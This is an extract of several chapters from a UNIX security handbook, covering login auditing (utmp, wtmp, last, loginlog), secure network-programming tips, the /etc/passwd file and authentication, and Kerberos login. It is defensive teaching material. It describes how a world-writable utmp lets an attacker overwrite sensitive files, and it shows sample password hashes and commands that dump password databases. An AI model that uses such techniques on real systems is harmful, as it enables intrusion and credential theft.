file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (5 of 9) [2002-04-12 10:44:56]


[Chapter 10] Auditing and Logging<br />

●<br />

Time that the entry was made<br />

The extended wtmpx file used by Solaris, IRIX and other SVR4 <strong>UNIX</strong> operating systems, includes the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Username (32 characters instead of 8)<br />

inittab id (indicates the type of connection; see Appendix C, <strong>UNIX</strong> Processes)<br />

Terminal name (32 characters instead of 12)<br />

Device name<br />

Process ID of the login shell<br />

Code that denotes the type of entry<br />

Exit status of the process<br />

Time that the entry was made<br />

Session ID<br />

Unused bytes for future expansions<br />

Remote host name (for logins that originated over a network)<br />

<strong>UNIX</strong> programs that report the users that are currently logged into the system (who, whodo, w, users, and finger), do<br />

so by scanning the /etc/utmp file. The write command checks this file to see if a user is currently logged in, and<br />

determines which terminal he is.<br />

The last program, which prints a detailed report of the times of the most recent user logins, does so by scanning the<br />

wtmp file.<br />

The ps command gives you a more accurate account of who is currently using your system than the who, whodo,<br />

users, and finger commands because under some circumstances, users can have processes running without having<br />

their usernames appear in the /etc/utmp or /var/adm/wtmp files. (For example, a user may have left a program<br />

running and then logged out, or used the rsh command instead of rlogin.)<br />

However, the commands who, users, and finger have several advantages over ps:<br />

●<br />

●<br />

●<br />

They often present their information in a format that is easier to read than the ps output.<br />

They sometimes contain information not present in the ps output, such as the names of remote host origins.<br />

They may run significantly faster than ps.<br />

NOTE: The permissions on the /etc/utmp file are sometimes set to be writable by any user on many<br />

systems. This is ostensibly to allow various user programs that create windows or virtual terminals to<br />

show the user as "logged" into each window without requiring superuser privileges. Unfortunately, if<br />

this file is world-writable, then any user can edit her entry to show a different username or terminal in a<br />

who listing - or to show none at all. (She can also edit anybody else's entry to show whatever she<br />

wants!) It also is the source of an old security hole that keeps reappearing in various vendors' releases<br />

of <strong>UNIX</strong>: by changing the terminal name in this file to that of a sensitive file, an attacker can get<br />

system programs that write to user terminals (such as wall and biff) to overwrite the target with selected<br />

output. This can lead to compromise or damage.<br />

If your system has a mode -rw-rw-rw- /etc/utmp file, we recommend that you change it to remove the<br />

write access for nonowners. Then complain to your vendor for not fixing such an old and well-known<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (6 of 9) [2002-04-12 10:44:56]


[Chapter 10] Auditing and Logging<br />

flaw.<br />

10.1.2.1 su command and /etc/utmp and /var/adm/wtmp files<br />

When you use the su command (see "su: Changing Who You Claim to Be" in Chapter 4, Users, Groups, and the<br />

Superuser), it creates a new process with both the process's real UID and effective UID altered. This gives you the<br />

ability to access another user's files, and run programs as the other user.<br />

However, while su does not change your entry in the /etc/utmp or the /var/adm/wtmpfiles, the finger command will<br />

continue to display the account to which you logged in, not the one that you su'ed to. Many other programs as well -<br />

such as mail - may not work properly when used from within a su subshell, as they determine your username from<br />

the /etc/utmp entry and not from the real or effective UID.<br />

Note that different versions of the su command have different options available that allow you to reset your<br />

environment, run a different command shell, or otherwise modify the default behavior. One common argument is a<br />

simple dash, as in "su - user". This form will cause the shell for user to start up as if it were a login shell.<br />

Thus, the su command should be used with caution. While it is useful for quick tests, because it does not properly<br />

update the utmp and wtmp files, it can cause substantial confusion to other users and to some system utilities.<br />

10.1.3 last Program<br />

Every time a user logs in or logs out, <strong>UNIX</strong> makes a record in the file wtmp. The last program displays the contents<br />

of this file in an understandable form.[4] If you run last with no arguments, the command displays all logins and<br />

logouts on every device. last will display the entire file; you can abort the display by pressing the interrupt character<br />

(usually CTRL-C):<br />

[4] On some SVR4 systems you can use the "who -a" command to view the contents of the wtmp file<br />

Check your documentation to see which command version you would use on your system.<br />

% last<br />

dpryor ttyp3 std.com Sat Mar 11 12:21 - 12:24 (00:02)<br />

simsong ttyp2 204.17.195.43 Sat Mar 11 11:56 - 11:57 (00:00)<br />

simsong ttyp1 204.17.195.43 Sat Mar 11 11:37 still logged in<br />

dpryor console Wed Mar 8 10:47 - 17:41 (2+06:53)<br />

devon console Wed Mar 8 10:43 - 10:47 (00:03)<br />

simsong ttyp3 pleasant.cambrid Mon Mar 6 16:27 - 16:28 (00:01)<br />

dpryor ftp mac4 Fri Mar 3 16:31 - 16:33 (00:02)<br />

dpryor console Fri Mar 3 12:01 - 10:43 (4+22:41)<br />

simsong ftp pleasant.cambrid Fri Mar 3 08:40 - 08:56 (00:15)<br />

simsong ttyp2 pleasant.cambrid Thu Mar 2 20:08 - 21:08 (00:59)<br />

...<br />

In this display, you can see that five login sessions have been active since March 7th: simsong, dpryor, devon,<br />

dpyror (again), and simsong (again). Two of the users (dpryor and devon) logged on to the computer console. The<br />

main user of this machine is probably the user dpryor (in fact, this computer is a workstation sitting on dpryor's<br />

desk.) The terminal name ftp indicates that dpryor was logged in for FTP file transfer. Other terminal names may<br />

also appear here, depending on your system type and configuration; for instance, you might have an entry showing<br />

pc-nfs as an entry type.<br />

The last command allows you to specify a username or a terminal as an argument to prune the amount of<br />

information displayed. If you provide a username, last displays logins and logouts only for that user. If you provide<br />

a terminal name, last displays logins and logouts only for the specified terminal:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (7 of 9) [2002-04-12 10:44:56]


[Chapter 10] Auditing and Logging<br />

% last dpryor<br />

dpryor ttyp3 std.com Sat Mar 11 12:21 - 12:24 (00:02)<br />

dpryor console Wed Mar 8 10:47 - 17:41 (2+06:53)<br />

dpryor ftp mac4 Fri Mar 3 16:31 - 16:33 (00:02)<br />

dpryor console Fri Mar 3 12:01 - 10:43 (4+22:41)<br />

dpryor ftp mac4 Mon Feb 27 10:43 - 10:45 (00:01)<br />

dpryor ttyp6 std.com Sun Feb 26 01:12 - 01:13 (00:01)<br />

dpryor ftp mac4 Thu Feb 23 14:42 - 14:43 (00:01)<br />

dpryor ftp mac4 Thu Feb 23 14:20 - 14:25 (00:04)<br />

dpryor ttyp3 mac4 Wed Feb 22 13:04 - 13:06 (00:02)<br />

dpryor console Tue Feb 21 09:57 - 12:01 (10+02:04)<br />

You may wish to issue the last command every morning to see if there were unexpected logins during the previous<br />

night.<br />

On some systems, the wtmp file also logs shutdowns and reboots.<br />

10.1.3.1 Pruning the wtmp file<br />

The wtmp file will continue to grow until you have no space left on your computer's hard disk. For this reason, many<br />

vendors include shell scripts with their <strong>UNIX</strong> releases that zero the wtmp file automatically on a regular basis (such<br />

as once a week or once a month). These scripts are run automatically by the cron program.<br />

For example, many monthly shell scripts contain a statement that looks like this:<br />

# zero the log file<br />

cat /dev/null >/var/adm/wtmp<br />

Instead of this simple-minded approach, you may wish to make a copy of the wtmp file first, so you'll be able to<br />

refer to logins in the previous month. To do so, you must locate the shell script that zeros your log file and add the<br />

following lines:<br />

# make a copy of the log file and zero the old one<br />

rm /var/adm/wtmp.old<br />

ln /var/adm/wtmp /var/adm/wtmp.old<br />

cp /dev/null /var/adm/wtmp.nul<br />

mv /var/adm/wtmp.nul /var/adm/wtmp<br />

Most versions of the last command allow you to specify a file to use other than wtmp by using the -f option. For<br />

example:<br />

% last -f /var/adm/wtmp.old<br />

Some versions of the last command do not allow you to specify a different wtmp file to search through. If you need<br />

to check this previous copy and you are using one of these systems, you will need to momentarily place the copy of<br />

the wtmp file back into its original location. For example, you might use the following shell script to do the trick:<br />

#!/bin/sh<br />

mv /var/adm/wtmp /var/adm/wtmp.real<br />

mv /var/adm/wtmp.old /var/adm/wtmp<br />

last $*<br />

mv /var/adm/wtmp /var/adm/wtmp.old<br />

mv /var/adm/wtmp.real /var/adm/wtmp<br />

This approach is not without its problems, however. Any logins and logouts will be logged to the wtmp.old file<br />

while the command is running.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (8 of 9) [2002-04-12 10:44:56]


[Chapter 10] Auditing and Logging<br />

10.1.4 loginlog File<br />

If you are using a System V-based version of <strong>UNIX</strong> (including Solaris), you can log failed login attempts in a<br />

special file called /var/adm/loginlog.<br />

To log failed login attempts, you must specifically create this file with the following sequence of commands:<br />

# touch /var/adm/loginlog<br />

# chmod 600 /var/adm/loginlog<br />

# chown root /var/adm/loginlog<br />

After this file is created, <strong>UNIX</strong> will log all failed login attempts to your system. A "failed login attempt" is defined<br />

as a login attempt in which a user tries to log into your system but types a bad password five times in a row.<br />

Normally, System V <strong>UNIX</strong> hangs up on the caller (or disconnects the Telnet connection) after the fifth attempt. If<br />

this file exists, <strong>UNIX</strong> will also log the fact that five bad attempts occurred.<br />

The contents of the file look like this:<br />

# cat /var/adm/loginlog<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:14 1995<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:20 1995<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:26 1995<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:39 1995<br />

simsong:/dev/pts/8:Mon Nov 27 00:42:50 1995<br />

#<br />

9.3 A Final Note 10.2 The acct/pacct Process<br />

Accounting File<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_01.htm (9 of 9) [2002-04-12 10:44:56]


[Chapter 23] 23.3 Tips on Writing Network Programs<br />

Chapter 23<br />

Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

23.3 Tips on Writing Network Programs<br />

If you are coding a new network service, there are also a number of pitfalls to consider. This is a partial<br />

list of concerns and advice for writing more secure network code:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

6.<br />

7.<br />

Don't make any hard-coded assumptions about service port numbers.<br />

Use the library getservbyname() and related calls, plus system include files, to get important<br />

values. Remember that sometimes constants aren't constant.<br />

Don't place undue reliance on the fact that any incoming packets are from (or claim to be from) a<br />

low-numbered, privileged port.<br />

Any PC can send from those ports, and forged packets can claim to be from any port.<br />

Don't place undue reliance on the source IP address in the packets of connections you received.<br />

Such items may be forged or altered.<br />

Do a reverse lookup on connections when you need a hostname for any reason.<br />

After you have obtained a hostname to go with the IP address you have, do another lookup on that<br />

hostname to ensure that its IP address matches what you have.<br />

Include some form of load shedding or load limiting in your server to handle cases of excessive<br />

load.<br />

Consider what should happen if someone makes a concerted effort to direct a denial of service<br />

attack against your server. For example, you may wish to have a server stop processing incoming<br />

requests if the load goes over some predefined value.<br />

Put reasonable time-outs on each network-oriented read request.<br />

A remote server that does not respond quickly may be common, but one that does not respond for<br />

days may hang up your code awaiting a reply. This rule is especially important in TCP-based<br />

servers that may continue attempting delivery indefinitely.<br />

Put reasonable time-outs on each network write request.<br />

If some remote server accepts the first few bytes and then blocks indefinitely, you do not want it to<br />

lock up your code awaiting completion.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_03.htm (1 of 3) [2002-04-12 10:44:56]


[Chapter 23] 23.3 Tips on Writing Network Programs<br />

8.<br />

9.<br />

10.<br />

11.<br />

Make no assumptions about the content of input data, no matter what the source is.<br />

For instance, do not assume that input is null-terminated, contains linefeeds, or is even in standard<br />

ASCII format. Your program should behave in a defined manner if it receives random binary data<br />

as well as expected input.<br />

Make no assumptions about the amount of input sent by the remote machine.<br />

Put in bounds checking on individual items read, and on the total amount of data read (see the<br />

sidebar for one reason why).<br />

Getting More Than You Expected<br />

You must ensure that your programs, whether they run locally or over a network, properly handle<br />

extended and ill-defined input. We illustrate this point with an edited retelling of an anecdote<br />

related to one of us by Tsutomu Shimomura.<br />

One day, Shimomura noticed that a certain Department of Energy FTP server machine was set to<br />

finger any machine from which it received an anonymous FTP request. This bothered Shimomura<br />

a little, as anonymous FTP is more or less as the name implies. Why should the administrators of<br />

that site care? If who was on the machines connecting to theirs mattered, they shouldn't have put<br />

up anonymous FTP.<br />

This also piqued Shimomura's scientific curiosity, however. Were they using standard finger? He<br />

modified his local inetd configuration to point incoming finger requests to his character generator<br />

(chargen). He then connected to the remote FTP server and logged out again.<br />

Over the next few hours, Shimomura's machine shipped tens of megabytes of characters to the<br />

remote site. Eventually, late at night, the connection was broken. The remote machine no longer<br />

answered any network requests and appeared to have disappeared from the network. When it<br />

reappeared the next morning, the automatic finger-of-machines connection for FTP was no longer<br />

present.<br />

The moral of this little story is that if you are going to ask for something, be sure that you are able<br />

to handle anything that you might get.<br />

Consider doing a call to the authd service on the remote site to identify the putative source of the<br />

connection.<br />

However, remember not to place too much trust in the response.<br />

Do not require the user to send a reusable password in cleartext over the network connection to<br />

authenticate himself.<br />

Either use one-time passwords, or some shared, secret method of authentication that does not<br />

require sending compromisable information across the network.<br />

For instance, the APOP protocol used in the POP mail service has the server send the client a<br />

unique character string, usually including the current date and time.[10] The client then hashes the<br />

timestamp together with the user's password. The result is sent back to the server. The server also<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_03.htm (2 of 3) [2002-04-12 10:44:56]


[Chapter 23] 23.3 Tips on Writing Network Programs<br />

12.<br />

13.<br />

14.<br />

15.<br />

16.<br />

17.<br />

has the password and performs the same operation to determine if there is a match. The password<br />

is never transmitted across the network. This approach is described further in the discussion of<br />

POP in Chapter 17, TCP/IP Services.<br />

[10] This string is usually referred to as a nonce.<br />

Consider adding some form of session encryption to prevent eavesdropping and foil session<br />

hijacking.<br />

But don't try writing your own cryptography functions; see Chapter 6, Cryptography, for<br />

algorithms that are known to be strong.<br />

Build in support to use a proxy.<br />

Consider using SOCKS, described in Chapter 22, Wrappers and Proxies) so that the code is<br />

firewall friendly.<br />

Make sure that good logging is performed.<br />

This includes logging connections, disconnects, rejected connections, detected errors, and format<br />

problems.<br />

Build in a graceful shutdown so that the system operator can signal the program to shut down and<br />

clean up sensitive materials.<br />

Usually, this process means trapping the TERM signal and cleaning up afterwards.<br />

Consider programming a "heartbeat" log function in servers that can be enabled dynamically.<br />

This function will periodically log a message indicating that the server was still active and working<br />

correctly, and possibly record some cumulative activity statistics.<br />

Build in some self recognition or locking to prevent more than one copy of a server from running<br />

at a time.<br />

Sometimes, services are accidentally restarted, which may lead to race conditions and the<br />

destruction of logs if it's not recognized and stopped early.<br />

23.2 Tips on Avoiding<br />

<strong>Sec</strong>urity-related Bugs<br />

23.4 Tips on Writing<br />

SUID/SGID Programs<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_03.htm (3 of 3) [2002-04-12 10:44:56]


[Chapter 3] 3.2 Passwords<br />

3.2 Passwords<br />

Chapter 3<br />

Users and Passwords<br />

Once you've entered your username, <strong>UNIX</strong> typically prompts you to enter your password. This section<br />

describes how <strong>UNIX</strong> stores and handles passwords on most systems and how you can select a good<br />

password.<br />

3.2.1 The /etc/passwd File<br />

<strong>UNIX</strong> uses the /etc/passwd file to keep track of every user on the system. The /etc/passwd file contains the<br />

username, real name, identification information, and basic account information for each user. Each line in<br />

the file contains a database record; the record fields are separated by a colon (:).<br />

You can use the cat command to display your system's /etc/passwd file. Here are a few sample lines from<br />

a typical file:<br />

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh<br />

daemon:*:1:1::/tmp:<br />

uucp:OORoMN9FyZfNE:4:4::/var/spool/uucppublic:/usr/lib/uucp/uucico<br />

rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh<br />

arlin:f8fk3j1OIf34.:182:100:Arlin Steinberg:/u/arlin:/bin/csh<br />

The first three accounts, root, daemon, and uucp, are system accounts, while rachel and arlin are accounts<br />

for individual users.<br />

The individual fields of the /etc/passwd file have fairly straightforward meanings. Table 3-1 explains a<br />

sample line from the file shown above<br />

Table 3.1: Example /etc/passwd Fields<br />

Field Contents<br />

rachel The username<br />

eH5/.mj7NB3dx The user's "encrypted password"<br />

181 The user's user identification number (UID)<br />

100 The user's group identification number (GID)<br />

Rachel Cohen The user's full name (also known as the GECOS or GCOS field)[3]<br />

/u/rachel The user's home directory<br />

/bin/ksh The user's shell[4]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_02.htm (1 of 5) [2002-04-12 10:44:57]


.<br />

[Chapter 3] 3.2 Passwords<br />

[3] When <strong>UNIX</strong> was first written, it ran on a small minicomputer. Many users at Bell Labs<br />

used their <strong>UNIX</strong> accounts to create batch jobs to be run via RJE (Remote Job Entry) on the<br />

bigger GECOS computer in the Labs. The user identification information for the RJE was<br />

kept in the /etc/passwd file as part of the standard user identification. GECOS stood for<br />

General Electric Computer Operating System; GE was one of several major companies that<br />

made computers around that time.<br />

[4] An empty field for the shell name does not mean that the user has no shell; instead, it<br />

means that the Bourne shell (/bin/sh) should be used as a default.<br />

Passwords are normally represented by a special encrypted format that is described in "The <strong>UNIX</strong><br />

Encrypted Password System" in Chapter 8, Defending Your Accounts; the password itself is not really<br />

stored in the file. Encrypted passwords may also be stored in separate shadow password files, which are<br />

also described in Chapter 8. The meanings of the UID and GID fields are described in Chapter 4, Users,<br />

Groups, and the Superuser.<br />

3.2.2 The /etc/passwd File and Network Databases<br />

These days, many organizations have moved away from large time-sharing computers and invested in<br />

large client/server networks containing many servers and dozens or hundreds of workstations. These<br />

systems are usually set up so that any user can make use of any workstation in a group or in the entire<br />

organization. When these systems are in use, every user effectively has an account on every workstation.<br />

Unfortunately, on these large, distributed systems, you cannot ensure that every computer has the same<br />

/etc/passwd file. For this reason, there are now several different commercial systems available that make<br />

the information stored in the /etc/passwd file available over a network.<br />

Four such systems are:<br />

●<br />

●<br />

●<br />

●<br />

Sun Microsystems' Network Information System (NIS)<br />

Sun Microsystems' NIS+<br />

Open Software Foundation's Distributed Computing Environment (DCE)<br />

NeXT Computer's NetInfo<br />

All of these systems take the information that is usually stored in each workstation's /etc/passwd file and<br />

store it in one or more network server computers. If you are using one of these systems and wish to view<br />

the contents of the password database, you cannot simply cat the /etc/passwd file. Instead, you must use a<br />

command that is specific to your system.<br />

Sun's NIS service supplements the information stored in workstations' own files. If you are using NIS and<br />

you wish to get a list of every user account, you would use the following command:<br />

% cat /etc/passwd;ypcat passwd<br />

Sun's NIS+ service can be configured to supplement or substitute its user account entries for those entries<br />

in the /etc/passwd file, depending on the contents of the /etc/nsswitch.conf file. If you are using a system<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_02.htm (2 of 5) [2002-04-12 10:44:57]


[Chapter 3] 3.2 Passwords<br />

that runs NIS+, you will want to use the niscat command and specify your NIS+ domain. For example:<br />

% niscat -o passwd.bigco<br />

On machines running NetInfo, the local /etc/passwd file is ignored and the network version is used<br />

instead. Therefore, if you are using NetInfo and wish to see the user accounts, you only need to type:<br />

% nidump passwd /<br />

Computers that are using DCE use an encrypted network database system as an alternative to encrypted<br />

passwords and /etc/passwd files. However, in order to maintain compatibility, some of them have<br />

programs which run on a regular basis that create a local /etc/passwd file. You should check your manuals<br />

for information about your specific system.<br />

These network database systems are described in greater detail in Chapter 19, RPC, NIS, NIS+, and<br />

Kerberos.<br />

At many sites, the administrators prefer not to use network database management systems for fear that the<br />

system itself may somehow become compromised. This fear may result from the fact that configurations<br />

are often complex, and sometimes the protocols are not particularly resistant to attack. In these<br />

environments, the administrator simply keeps one central file of user information and then copies it to<br />

remote machines on a periodic basis (for example, using rdist). The drawback to this approach is that it<br />

often requires the administrator to intervene to change a user password or shell entry. In general, you<br />

should learn to master the configuration of the system supplied by your vendor and use it. You can then<br />

put other safeguards in place, such as those mentioned in Chapter 21, Firewalls, and in Chapter 22,<br />

Wrappers and Proxies.<br />

NOTE: Because there are so many different ways to access the information that has<br />

traditionally been stored in the /etc/passwd file, throughout this book we will simply use the<br />

phrase "password file" or "/etc/passwd" as a shorthand for the multitude of different systems.<br />

In the programming examples, we will use a special command called " cat-passwd" that<br />

prints the contents of the password database on standard output. On a traditional <strong>UNIX</strong><br />

system without shadow passwords, the cat-passwd command could simply be the command<br />

cat /etc/passwd. On a machine running NIS, it could be the command ypcat passwd. You<br />

could write such a program for yourself that would to make repeated calls to the getpwent()<br />

library call and print the results.<br />

3.2.3 Authentication<br />

After you tell <strong>UNIX</strong> who you are, you must prove your identity. This process is called authentication.<br />

Classically, there are three different ways that you can authenticate yourself to a computer system, and<br />

you use one or more of them each time:<br />

1.<br />

2.<br />

3.<br />

You can tell the computer something that you know (for example, a password).<br />

You can "show" the computer something you have (for example, a card key).<br />

You can let the computer measure something about you (for example, your fingerprint).<br />

None of these systems is foolproof. For example, by eavesdropping on your terminal line, somebody can<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_02.htm (3 of 5) [2002-04-12 10:44:57]


[Chapter 3] 3.2 Passwords<br />

learn your password. By attacking you at gunpoint, somebody can steal your card key. And if your<br />

attacker has a knife, you might even lose your finger! In general, the more trustworthy the form of<br />

identification, the more troublesome the method is to use, and the more aggressive an attacker must be to<br />

compromise it.<br />

3.2.4 Passwords Are a Shared <strong>Sec</strong>ret<br />

Passwords are the simplest form of authentication: they are a secret that you share with the computer.<br />

When you log in, you type your password to prove to the computer that you are who you claim to be. The<br />

computer ensures that the password you type matches the account that you have specified. If they match,<br />

you are allowed to proceed.<br />

<strong>UNIX</strong> doesn't display your password as you type it. This gives you extra protection if you're using a<br />

printing terminal or if somebody is watching over your shoulder as you type.[5]<br />

[5] This is sometimes referred to as shoulder surfing.<br />

Passwords are normally <strong>UNIX</strong>'s first line of defense against outsiders who want to break into your system.<br />

Although you could break into a system or steal information through the network without first logging in,<br />

many break-ins result because of poorly chosen or poorly protected passwords.<br />

3.2.5 Why Use Passwords?<br />

Most desktop personal computers do not use passwords (although there are several third-party programs<br />

that do provide varying degrees of protection, and passwords are used by both the Windows and<br />

Macintosh network filesystems). The fact that the PC has no passwords makes the computer easier to use,<br />

both by the machine's primary user and by anybody else who happens to be in the area. People with PCs<br />

rely on physical security - doors, walls, and locks - to protect the information stored on their disks from<br />

vandals and computer criminals.<br />

Likewise, many of the research groups that originally developed the <strong>UNIX</strong> operating system did not have<br />

passwords for individual users - often for the same reason that they shied away from locks on desks and<br />

office doors. In these environments, trust, respect, and social convention were very powerful deterrents to<br />

information theft and destruction.<br />

But when a computer is connected to a modem that can be accessed from almost any place in the world<br />

that has a telephone, or when it is connected to a network that is used by people outside the immediate<br />

group, passwords on computer accounts become just as necessary as locks on the doors of a townhouse:<br />

without them, an intruder can come right in, unhindered, and wreak havoc. And indeed, in today's<br />

electronic world, there are numerous people who try the "front door" of every computer they can find. If<br />

the door is unlocked, sometimes the vandals will enter and do damage.<br />

Passwords are especially important on computers that are shared by several people, or on computers that<br />

are connected to networks where various computers have trust relationships with each other (we'll explain<br />

what this means in a later chapter). In such circumstances, a single easily compromised account can<br />

endanger the security of the entire installation or network.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_02.htm (4 of 5) [2002-04-12 10:44:57]


[Chapter 3] 3.2 Passwords<br />

3.2.6 Conventional <strong>UNIX</strong> Passwords<br />

Today, most <strong>UNIX</strong> systems use simple passwords to authenticate users: the user knows a password, and<br />

types the password into the computer to log in.<br />

Conventional passwords have been part of <strong>UNIX</strong> since its early years. The advantage of this system is that<br />

it runs without any special equipment (such as card readers or fingerprint scanners).<br />

The disadvantage of conventional passwords is that they are easily foiled - especially if you log into your<br />

computer over a network. In recent years, conventional passwords have not provided dependable security<br />

in a networked environment: there are simply too many opportunities for a sophisticated attacker to<br />

capture a password and then use it at a later time.[6] Today, even unsophisticated attackers can launch<br />

these attacks, thanks to a variety of sophisticated tools available on the net. The only way to safely use a<br />

<strong>UNIX</strong> computer remotely over a network such as the <strong>Internet</strong> is to use either (or both) one-time passwords<br />

or data encryption (see <strong>Sec</strong>tion 3.7, "One-Time Passwords later in this chapter and in Chapter 8, and<br />

Chapter 6, Cryptography).<br />

[6] Passwords are still quite effective for most stand-alone systems with hard-wired<br />

terminals.<br />

Unfortunately, we live in an imperfect world, and most <strong>UNIX</strong> systems continue to depend on reusable<br />

passwords for user authentication. As such, passwords continue to be one of the most widely exploited<br />

methods of compromising <strong>UNIX</strong> systems on networks.<br />

3.1 Usernames 3.3 Entering Your Password<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_02.htm (5 of 5) [2002-04-12 10:44:57]


[Chapter 19] 19.6 Kerberos<br />

19.6 Kerberos<br />

Chapter 19<br />

RPC, NIS, NIS+, and Kerberos<br />

In 1983 the Massachusetts Institute of Technology, working with IBM and Digital Equipment<br />

Corporation, embarked on an eight-year project designed to integrate computers into the university's<br />

undergraduate curriculum. The project was called Project Athena.<br />

Athena began operation with nearly 50 traditional time-sharing minicomputers: Digital Equipment<br />

Corporation's VAX 11/750 systems running Berkeley 4.2 <strong>UNIX</strong>. Each VAX had a few terminals; when a<br />

student or faculty member wanted to use a computer, he or she sat down at one of its terminals.<br />

Within a few years, Athena began moving away from the 750s. The project received hundreds of<br />

high-performance workstations with big screens, fast computers, small disks, and Ethernet interfaces.<br />

The project's goal was to allow any user to sit down at any computer and enjoy full access to his files and<br />

to the network.<br />

Of course there were problems. As soon as the workstations were deployed, the problems of network<br />

eavesdropping became painfully obvious; with the network accessible from all over campus, nothing<br />

prevented students (or outside intruders) from running network spy programs. It was nearly impossible to<br />

prevent the students from learning the superuser password of the workstations or simply rebooting them<br />

in single-user mode. To further complicate matters, many of the computers on the network were IBM<br />

PC/ATS that didn't have even rudimentary internal computer security. Something had to be done to<br />

protect student files in the networked environment to the same degree that they were protected in the<br />

time-sharing environment.<br />

Athena's ultimate solution to this security problem was Kerberos, an authentication system that uses DES<br />

cryptography to protect sensitive information such as passwords on an open network. When the user logs<br />

in to a workstation running Kerberos, that user is issued a ticket from the Kerberos Server. The user's<br />

ticket can only be decrypted with the user's password; it contains information necessary to obtain<br />

additional tickets. From that point on, whenever the user wishes to access a network service, an<br />

appropriate ticket for that service must be presented. As all of the information in the Kerberos tickets is<br />

encrypted before it is sent over the network, the information is not susceptible to eavesdropping or<br />

misappropriation.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (1 of 9) [2002-04-12 10:44:58]


[Chapter 19] 19.6 Kerberos<br />

19.6.1 Kerberos Authentication<br />

Kerberos authentication is based entirely on the knowledge of passwords that are stored on the Kerberos<br />

Server. Unlike <strong>UNIX</strong> passwords, which are encrypted with a one-way algorithm that cannot be reversed,<br />

Kerberos passwords are stored on the server encrypted with a conventional encryption algorithm - in this<br />

case, DES - so that they can be decrypted by the server when needed. A user proves her identity to the<br />

Kerberos Server by demonstrating knowledge of her key.<br />

The fact that the Kerberos Server has access to the user's decrypted password is a result of the fact that<br />

Kerberos does not use public key cryptography. It is a serious disadvantage of the Kerberos system. It<br />

means that the Kerberos Server must be both physically secure and "computationally secure." The server<br />

must be physically secure to prevent an attacker from stealing the Kerberos Server and learning all of the<br />

users' passwords. The server must also be immune to login attacks: if an attacker could log onto the<br />

server and become root, that attacker could, once again, steal all of the passwords.<br />

Kerberos was designed so that the server can be stateless.[14] The Kerberos Server simply answers<br />

requests from users and issues tickets (when appropriate). This design makes it relatively simple to create<br />

replicated, secondary servers that can handle authentication requests when the primary server is down or<br />

otherwise unavailable. Unfortunately, these secondary servers need complete copies of the entire<br />

Kerberos database, which means that they must also be physically and computationally secure.<br />

[14] The server actually has a lot of permanent, sensitive state - the user passwords - but this<br />

is kept on the hard disk, rather than in RAM, and does not need to be updated during the<br />

course of Kerberos transactions.<br />

19.6.1.1 Initial login<br />

Logging into a <strong>UNIX</strong> workstation that is using Kerberos looks the same to a user as logging into a<br />

regular <strong>UNIX</strong> time-sharing computer. Sitting at the workstation, you see the traditional login: and<br />

password: prompts. You type your username and password, and if they are correct, you get logged in.<br />

Accessing files, electronic mail, printers, and other resources all work as expected.<br />

What happens behind the scenes, however, is far more complicated, and actually differs between the two<br />

different versions of Kerberos that are commonly available: Kerberos version 4 and Kerberos version 5.<br />

With Kerberos 4, the workstation sends a message to the Kerberos Authentication Server [15] after you<br />

type your username. This message contains your username and indicates that you are trying to log in.<br />

The Kerberos Server checks its database and, if you are a valid user, sends back a ticket granting ticket<br />

that is encrypted with your password. The workstation then asks you to type in your password and finally<br />

attempts to decrypt the encrypted ticket using the password that you've supplied. If the decryption is<br />

successful, the workstation then forgets your password, and uses the ticket granting ticket exclusively. If<br />

the decryption fails, the workstation knows that you supplied the wrong password and it gives you a<br />

chance to try again.[16]<br />

[15] According to the Kerberos papers and documentation, there are two Kerberos Servers:<br />

the Authentication Server and the Ticket Granting Service. Some commentators think that<br />

this is disingenuous, because all Kerberos systems simply have a single server, the Kerberos<br />

Server or Key Server.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_06.htm (2 of 9) [2002-04-12 10:44:58]


[Chapter 19] 19.6 Kerberos<br />

[16] Actually, the initial ticket that the Kerberos Server sends your workstation is encrypted<br />

with a 56-bit number that is derived from your password using a one-way cryptographic<br />

function.<br />

With Kerberos 5, the workstation waits until after you have typed your password before contacting the<br />

server. It then sends the Kerberos Authentication Server a message consisting of your username and the<br />

current time encrypted with your password. The Authentication Server server looks up your username,<br />

determines your password, and attempts to decrypt the encrypted time. If the server can decrypt the<br />

